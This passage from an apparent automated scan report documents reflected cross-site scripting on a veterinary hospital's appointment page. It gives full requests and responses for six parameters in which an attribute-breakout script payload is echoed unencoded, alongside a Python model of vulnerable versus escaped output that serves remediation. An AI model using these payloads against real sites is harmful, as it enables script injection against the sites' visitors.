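its leading "> closes the attribute and the tag.

```python
import html
import re
from urllib.parse import parse_qsl

# Payload shape used for every finding in the report: random prefix, an
# attribute breakout, random suffix.  The prefix/suffix make each reflection
# uniquely searchable in the response.
PAYLOAD = '"><script>alert(1)</script>'
PATH = "/new-york-veterinary-hospital/appt.html"
# Text inputs whose value="..." the report shows echoing the parameter.
FORM_FIELDS = ("lname", "other", "petage", "petname", "phone")


def render_vulnerable(query: str) -> str:
    """Assumed model of appt.html, reconstructed from the report's response
    snippets (not the site's real PHP): every text field is echoed into
    value="..." unencoded, and a hidden 'uri' field echoes the whole request
    URI, query string included."""
    params = dict(parse_qsl(query, keep_blank_values=True))
    uri = f"http://www.vcahospitals.com{PATH}?{query}"
    tags = [f'<input type="hidden" name="uri" id="uri" value="{uri}" />']
    for name in FORM_FIELDS:
        tags.append(f'<input name="{name}" id="{name}" type="text" '
                    f'value="{params.get(name, "")}" />')
    return "\n".join(tags)


def render_hardened(query: str) -> str:
    """The same page with attribute-context output encoding on every reflected
    value.  html.escape(..., quote=True) rewrites & < > " and ' as entities,
    so a value can no longer terminate the attribute it is placed in."""
    params = dict(parse_qsl(query, keep_blank_values=True))
    uri = html.escape(f"http://www.vcahospitals.com{PATH}?{query}", quote=True)
    tags = [f'<input type="hidden" name="uri" id="uri" value="{uri}" />']
    for name in FORM_FIELDS:
        value = html.escape(params.get(name, ""), quote=True)
        tags.append(f'<input name="{name}" id="{name}" type="text" '
                    f'value="{value}" />')
    return "\n".join(tags)


def attribute_breakouts(body: str, prefix: str, suffix: str) -> list:
    """Return the name= of every input in which prefix+PAYLOAD+suffix appears
    verbatim (no entity encoding) inside a double-quoted attribute of an open
    tag.  That is the context in which the leading '">' closes the attribute
    and the tag, leaving <script> in the HTML body."""
    canary = prefix + PAYLOAD + suffix
    hits, pos = [], 0
    while (idx := body.find(canary, pos)) != -1:
        tag_open = body.rfind("<", 0, idx)
        tag_close = body.rfind(">", 0, idx)
        # Inside a tag, and an odd number of '"' since it opened, means the
        # insertion point is still inside a double-quoted attribute value.
        if tag_open > tag_close and body.count('"', tag_open, idx) % 2 == 1:
            m = re.search(r'name="([^"]*)"', body[tag_open:idx])
            hits.append(m.group(1) if m else "?")
        pos = idx + len(canary)
    return hits


def scan(prefix: str, suffix: str, param: str = None, render=render_vulnerable) -> list:
    """Send the canary in one parameter of a trimmed appt.html query string
    (constructed here to match the shape of the report's requests) and report
    where it breaks out.  With param=None the canary becomes the parameter
    *name*, the case in 2.104."""
    canary = prefix + PAYLOAD + suffix
    if param is None:
        query = f"{canary}=1"
    else:
        query = f"altphone=&{param}={canary}&source=new-york-veterinary-hospital"
    return attribute_breakouts(render(query), prefix, suffix)


if __name__ == "__main__":
    print(scan("f53d0", "9b9f80a0f40", "lname"))                          # ['uri', 'lname']
    print(scan("22281", "d33a2c5892d"))                                   # ['uri']
    print(scan("f53d0", "9b9f80a0f40", "lname", render=render_hardened))  # []
```

Two points the model makes visible. First, a value that comes back as &quot;&gt;&lt;script&gt; is still "reflected" but cannot leave the attribute, which is why the check insists on a verbatim match in attribute context rather than a bare substring search. Second, the hidden uri field is the reason every parameter, and any parameter name, reflects: encoding the individual text inputs without also encoding uri leaves 2.104, 2.105, 2.109 and 2.111 open. In the PHP the site reports running, the equivalent of html.escape(..., quote=True) is htmlspecialchars($v, ENT_QUOTES, 'UTF-8') applied at the point of output.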

2.112. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [referer parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /new-york-veterinary-hospital/appt.html

Issue detail

The value of the referer request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60be4"><script>alert(1)</script>496b4f91b44 was submitted in the referer parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=60be4"><script>alert(1)</script>496b4f91b44&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d69ad90c98185c3bfbf109c1ee7f2ceae%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%25
3b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322) HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:47:58 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=kj92hmpgpn5u0e6c6lisgdjpj2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 23515

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
mpm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=60be4"><script>alert(1)</script>496b4f91b44&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.
...[SNIP]...

2.113. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [source parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /new-york-veterinary-hospital/appt.html

Issue detail

The value of the source request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 321c7"><script>alert(1)</script>32eff3265ff was submitted in the source parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital321c7"><script>alert(1)</script>32eff3265ff&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d69ad90c98185c3bfbf109c1ee7f2ceae%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%25
3b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322) HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:48:02 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=mc85tfs8n4tb3ncs6vao1tc4e7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 23515

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital321c7"><script>alert(1)</script>32eff3265ff&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26am
...[SNIP]...

2.114. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [submit parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /new-york-veterinary-hospital/appt.html

Issue detail

The value of the submit request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 287cc"><script>alert(1)</script>5f92cd18c67 was submitted in the submit parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment287cc"><script>alert(1)</script>5f92cd18c67&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d69ad90c98185c3bfbf109c1ee7f2ceae%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%25
3b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322) HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:48:06 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=3dmerjf0pu4ur5m108fr6u0eo4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 23515

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
e2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment287cc"><script>alert(1)</script>5f92cd18c67&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_t
...[SNIP]...

2.115. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [time1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /new-york-veterinary-hospital/appt.html

Issue detail

The value of the time1 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c314"><script>alert(1)</script>8b54768be74 was submitted in the time1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=1c314"><script>alert(1)</script>8b54768be74&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d69ad90c98185c3bfbf109c1ee7f2ceae%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%25
3b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322) HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:48:11 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=va0mcsa20967inl4q6o12l7ce1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 23558

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<input name="time1" id="time1" type="text" size="15" maxlength="50" value="1c314"><script>alert(1)</script>8b54768be74" />
...[SNIP]...

2.116. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [time2 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /new-york-veterinary-hospital/appt.html

Issue detail

The value of the time2 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36704"><script>alert(1)</script>8897a2f5b0 was submitted in the time2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=36704"><script>alert(1)</script>8897a2f5b0&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d69ad90c98185c3bfbf109c1ee7f2ceae%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253
b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322) HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:48:15 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=3pljhhs657854au6aumnm7vhq1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 23556

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<input name="time2" id="time2" type="text" size="15" maxlength="50" value="36704"><script>alert(1)</script>8897a2f5b0" />
...[SNIP]...

2.117. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [time3 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /new-york-veterinary-hospital/appt.html

Issue detail

The value of the time3 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbc15"><script>alert(1)</script>a12a15661f1 was submitted in the time3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=fbc15"><script>alert(1)</script>a12a15661f1&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d69ad90c98185c3bfbf109c1ee7f2ceae%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%25
3b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322) HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:48:19 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=9nroe6rd3or4ki6oso4miqpib1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 23558

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
